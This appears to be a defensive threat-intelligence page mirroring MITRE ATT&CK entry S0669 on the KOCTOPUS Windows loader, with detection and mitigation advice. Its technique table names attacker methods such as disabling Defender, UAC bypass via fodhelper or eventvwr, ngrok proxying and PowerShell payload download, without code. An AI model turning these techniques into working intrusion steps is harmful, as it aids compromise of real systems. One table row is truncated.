S0669: KOCTOPUS
Analyst context for executives and security teams
KOCTOPUS matters because it is described as a Windows loader used to launch follow-on remote access tooling such as Octopus, Koadic, and in some cases QuasarRAT. For leaders, the practical issue is not only the loader itself, but whether phishing-driven script execution, PowerShell/cmd/VBA activity, registry persistence, tool transfer, and stealth behaviors would be visible quickly enough to support containment decisions.
Executive priority
Prioritize KOCTOPUS as a validation case for Windows endpoint resilience, phishing response readiness, and SOC visibility over script-based malware chains. The relationship to LazyScripter, which MITRE describes as mainly targeting the airlines industry since at least 2018, makes this especially relevant for organizations with aviation exposure or similar operational-continuity requirements. Executives should ask whether email security, endpoint logging, PowerShell/script controls, registry monitoring, and incident response evidence preservation are sufficient to reconstruct and contain a loader-to-RAT sequence.
Technical view
ATT&CK does not provide a dedicated detection section for KOCTOPUS, so defenders should validate coverage through the related behaviors: spearphishing links or attachments leading to user execution; batch, PowerShell, Windows command shell, and VBA execution; command obfuscation and deobfuscation; registry modification and Run Key or Startup Folder persistence; UAC bypass attempts; hidden windows; system information discovery; ingress tool transfer; proxy use for command and control; and possible security tool impairment or cleanup of persistence artifacts. Detection engineering should correlate email, endpoint process, script, registry, file-transfer, and network telemetry rather than relying on a single malware signature.
Likely telemetry
- Email gateway and user-reporting evidence for suspicious attachments and links
- Windows process creation telemetry for cmd.exe, PowerShell, script hosts, Office-spawned processes, and unusual parent-child chains
- PowerShell script block, module, and command-line logging where available
- Command-line content showing obfuscation, decoding, or suspicious interpreter usage
- Registry auditing for Run Keys, Startup Folder changes, and other suspicious modifications
Detection direction
- Validate phishing-to-execution correlation: email event, user interaction, spawned script/interpreter, and downloaded or launched payload should be linkable in the SOC workflow.
- Tune for suspicious Windows interpreter chains involving batch files, PowerShell, cmd, VBA, and Office-originated execution, while accounting for legitimate administrative scripting.
- Add analytic focus on obfuscated command lines and subsequent decode/deobfuscation behavior instead of matching only static strings.
- Monitor registry persistence and cleanup together; removal of persistence artifacts can be part of adversary tradecraft and may erase evidence needed by incident responders.
- Correlate ingress tool transfer with later execution of known remote access tooling families referenced by MITRE, without assuming every event is KOCTOPUS.
Mitigation priorities
- Reduce phishing execution risk through attachment/link controls, user reporting workflows, and rapid triage of suspected spearphishing events.
- Harden Windows script execution paths with least privilege, controlled use of PowerShell, and restrictions appropriate to business operations.
- Protect persistence points by monitoring and limiting unauthorized registry and Startup Folder changes.
- Ensure endpoint security and logging agents are tamper-resistant and generate alerts when disabled, modified, or stopped.
- Maintain egress visibility through DNS, proxy, and network logging so potential proxy or tool-transfer behavior can be investigated.
Analyst notes and limits
The supplied ATT&CK object identifies KOCTOPUS as a loader with batch and VBA variants and links it to LazyScripter and multiple techniques. The strongest defensive value is using KOCTOPUS as a scenario for validating Windows script execution, phishing response, persistence monitoring, and follow-on tool detection. Local baselines are essential because many related behaviors overlap with legitimate administration.
MITRE does not provide official detection guidance for this object, and the object’s own tactics are not specified. Several related techniques include platforms beyond Windows, but KOCTOPUS itself is supplied here as Windows; platform statements should therefore remain Windows-focused unless local evidence expands scope. No active exploitation, customer exposure, or guaranteed detection coverage is implied.
KOCTOPUS
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1685 | Disable or Modify Tools | KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | KOCTOPUS has been distributed via spearphishing emails with malicious attachments.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | KOCTOPUS has deobfuscated itself before executing its commands.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1204.002 | Malicious File Sub-technique | KOCTOPUS has relied on victims clicking a malicious document for execution.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1090 | Proxy | KOCTOPUS has deployed a modified version of Invoke-Ngrok to expose open local ports to the Internet.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1112 | Modify Registry | KOCTOPUS has added and deleted keys from the Registry.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | KOCTOPUS has been distributed as a malicious link within an email.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1082 | System Information Discovery | KOCTOPUS has checked the OS version using `wmic.exe` and the `find` command.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1564.003 | Hidden Window Sub-technique | KOCTOPUS has used |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | KOCTOPUS has used `cmd.exe` and batch files for execution.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1105 | Ingress Tool Transfer | KOCTOPUS has executed a PowerShell command to download a file to the system.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1204.001 | Malicious Link Sub-technique | KOCTOPUS has relied on victims clicking on a malicious link delivered via email.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1070.009 | Clear Persistence Sub-technique | KOCTOPUS can delete created registry keys used for persistence as part of its cleanup procedure.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | KOCTOPUS has been disguised as legitimate software programs associated with the travel and airline industries.CitationArghire LazyScripter |
| Enterprise | T1106 | Native API | KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1059.001 | PowerShell Sub-technique | KOCTOPUS has used PowerShell commands to download additional files.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1548.002 | Bypass User Account Control Sub-technique | KOCTOPUS will perform UAC bypass either through fodhelper.exe or eventvwr.exe.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | KOCTOPUS has obfuscated scripts with the BatchEncryption tool.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1059.005 | Visual Basic Sub-technique | KOCTOPUS has used VBScript to call wscript to execute a PowerShell command.CitationMalwareBytes LazyScripter Feb 2021 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | KOCTOPUS can set the AutoRun Registry key with a PowerShell command.CitationMalwareBytes LazyScripter Feb 2021 |
Groups, software, and campaigns
G0140: LazyScripter
LazyScripter is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.2 | Current bundle | 03fe1b6e635b… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
MalwareBytes LazyScripter Feb 2021
Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024.
Open source URL -
[2]
KOCTOPUS
(Citation: MalwareBytes LazyScripter Feb 2021)
-
[3]
mitre-attack S0669Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.